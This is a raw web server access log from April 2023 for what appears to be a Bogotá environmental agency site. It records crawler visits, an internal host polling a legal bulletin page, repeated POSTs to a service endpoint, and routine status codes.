66.249.70.168 - - [08/Apr/2023:03:47:42 -0500] "GET /incautadas-cuatro-aves-y-mas-9-mil-gramos-de-productos-de-fauna-silvestre.html HTTP/1.1" 200 884
199.16.157.183 - - [08/Apr/2023:03:48:22 -0500] "GET /con-pinceles-y-acuarelas-veronica-martinez-protege-la-biodiversidad.html HTTP/1.1" 200 990
199.16.157.183 - - [08/Apr/2023:03:48:22 -0500] "GET /images/cronica-mujer-biodiveridad-30-noviembre.jpg HTTP/1.1" 200 63270
199.16.157.183 - - [08/Apr/2023:03:48:23 -0500] "GET /con-pinceles-y-acuarelas-veronica-martinez-protege-la-biodiversidad.html HTTP/1.1" 200 990
199.16.157.181 - - [08/Apr/2023:03:48:23 -0500] "GET /images/cronica-mujer-biodiveridad-30-noviembre.jpg HTTP/1.1" 200 63270
201.245.192.253 - - [08/Apr/2023:03:49:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
69.171.249.4 - - [08/Apr/2023:03:49:15 -0500] "GET /negocios-verdes-de-bogota-se-reuniran-este-fin-de-semana-en-el-centro-comercial-el-retiro.html HTTP/1.1" 206 902
216.245.221.92 - - [08/Apr/2023:03:50:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:03:49:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:03:50:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
104.152.52.95 - - [08/Apr/2023:03:52:33 -0500] "GET / HTTP/1.0" 200 319
201.245.192.253 - - [08/Apr/2023:03:54:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
216.245.221.92 - - [08/Apr/2023:03:55:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.172 - - [08/Apr/2023:03:55:51 -0500] "-" 408 -
172.22.2.4 - - [08/Apr/2023:03:55:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
13.68.186.138 - - [08/Apr/2023:03:57:42 -0500] "GET /portaldeninos/parque-ecologico-distrital-humedal-santa-maria-del-lago/ HTTP/1.1" 200 90199
172.22.2.4 - - [08/Apr/2023:03:56:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
201.245.192.253 - - [08/Apr/2023:03:58:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:03:59:14 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 304 -
40.77.167.161 - - [08/Apr/2023:04:00:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/5380.pdf HTTP/1.1" 304 -
216.245.221.92 - - [08/Apr/2023:04:00:31 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.224 - - [08/Apr/2023:04:01:36 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
40.77.167.231 - - [08/Apr/2023:04:01:55 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
172.22.2.4 - - [08/Apr/2023:04:01:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:04:03:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:04:02:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
216.245.221.92 - - [08/Apr/2023:04:05:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:04:06:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [08/Apr/2023:04:07:26 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20C-595-2010.doc HTTP/1.1" 200 39424
157.55.39.224 - - [08/Apr/2023:04:08:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/1612.pdf HTTP/1.1" 304 -
201.245.192.253 - - [08/Apr/2023:04:08:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:04:07:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:04:08:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
216.245.221.92 - - [08/Apr/2023:04:10:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.97 - - [08/Apr/2023:04:10:33 -0500] "-" 408 -
201.245.192.253 - - [08/Apr/2023:04:13:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:04:13:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
121.30.179.83 - - [08/Apr/2023:04:15:08 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2004%20del%2023%20de%20Diciembre%20de%202016.pdf HTTP/1.1" 200 327098
216.245.221.92 - - [08/Apr/2023:04:15:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:04:14:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
114.119.150.38 - - [08/Apr/2023:04:17:53 -0500] "-" 408 -
40.77.167.231 - - [08/Apr/2023:04:18:38 -0500] "GET /BLA/resoluciones/AUTOS%202019/1960.pdf HTTP/1.1" 200 326067
172.22.2.4 - - [08/Apr/2023:04:18:39 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
201.245.192.253 - - [08/Apr/2023:04:18:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
66.249.70.172 - - [08/Apr/2023:04:19:04 -0500] "-" 408 -
201.245.192.253 - - [08/Apr/2023:04:20:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42690
201.245.192.253 - - [08/Apr/2023:04:20:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42861
216.245.221.92 - - [08/Apr/2023:04:20:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:04:19:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:04:19:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [08/Apr/2023:04:23:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
40.77.167.141 - - [08/Apr/2023:04:24:51 -0500] "GET /transparencia/financiera/Desagregado%20con%20modificaciones/? HTTP/1.1" 200 40929
216.245.221.92 - - [08/Apr/2023:04:25:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:04:24:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:04:25:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
172.22.2.4 - - [08/Apr/2023:04:28:32 -0500] "GET /BLA/boletinlegal/ab2g HTTP/1.1" 404 1018
172.22.2.4 - - [08/Apr/2023:04:28:46 -0500] "GET /BLA/boletinlegal/t4 HTTP/1.1" 404 1018
172.22.2.4 - - [08/Apr/2023:04:28:48 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
201.245.192.253 - - [08/Apr/2023:04:28:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:04:28:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 28619
179.43.177.242 - - [08/Apr/2023:04:29:28 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [08/Apr/2023:04:30:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42690
201.245.192.253 - - [08/Apr/2023:04:30:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42861
216.245.221.92 - - [08/Apr/2023:04:30:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.97 - - [08/Apr/2023:04:32:02 -0500] "-" 408 -
172.22.2.4 - - [08/Apr/2023:04:30:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:04:31:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
